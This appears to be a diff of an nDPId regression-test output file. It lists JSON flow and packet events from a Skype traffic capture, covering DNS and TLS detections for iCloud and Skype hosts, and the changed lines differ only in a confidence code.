00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431969719055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1431969719055,"pkt":"0NQSxnP1PBXCt3IOCABFAABXAXoAAEAR9ajAqAEiwKgBAfP2ADUAQxAUbrQBAAABAAAAAAAAE3AwNS1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQZha2FkbnMDbmV0AAABAAE="} 
-00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431969719110,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1431969719110,"pkt":"PBXCt3IO0NQSxnP1CABFAAB3AABAAEARtwLAqAEBwKgBIgA18\/YAY7LlbrSBgAABAAIAAAAAE3AwNS1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQZha2FkbnMDbmV0AAABAAHADAABAAEAAAAZAAQRrGQkwAwAAQABAAAAGQAEEaxkCA=="} -00816{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.172.100.36"}} +00816{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.172.100.36"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719110,"flow_last_seen":1431969719110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431969719110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719110,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHqNAAEAG5HrAqAEiEaxkJMPQAbsLGQpgAAAAALAC\/\/8xEQAAAgQFtAEDAwUBAQgKPiO1KQAAAAAEAgAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431969719259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1431969719259,"pkt":"PBXCt3IO0NQSxnP1CABFAAAsDItAAPAGRqYRrGQkwKgBIgG7w9AFbnZwCxkKYWASH\/7prQAAAgQFoAAA"} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431969719259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719259,"pkt":"0NQSxnP1PBXCt3IOCABFAAAocytAAEAGkArAqAEiEaxkJMPQAbsLGQphBW52cVAQ\/\/8hVQAA"} -00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719561,"flow_last_seen":1431969719561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719561,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431969719561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719561,"pkt":"0NQSxnP1PBXCt3IOCABFAABAR+5AAEAG+sPAqAEiW77afcPRMD4OYtZAAAAAALAC\/\/9xPAAAAgQFtAEDAwUBAQgKPiO25AAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2177,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431969719623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969719623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0Hj5AAPQGcH9bvtp9wKgBIjA+w9E3PWT9DmLWQYASH\/7iJQAAAgQFoAEDAwQBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431969719623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719623,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo4VtAAEAGYW7AqAEiW77afcPRMD4OYtZBNz1k\/lAQIAAi3wAA"} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABKnloAAEARWNXAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABK65gAAEARC5fAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2241,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969716015,"flow_last_seen":1431969721054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431969721054,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2273,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKt0gAAEARP+fAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKslEAAEARRN7AqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431969721954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969721954,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0TgAAEARJgHAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431969721954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969721954,"pkt":"0NQSxnP1PBXCt3IOCABFAABAl6MAAEARX5bAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 
-00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK1+UAAEARH0rAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK050AAEARI5LAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969722958,"flow_last_seen":1431969722958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969722958,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
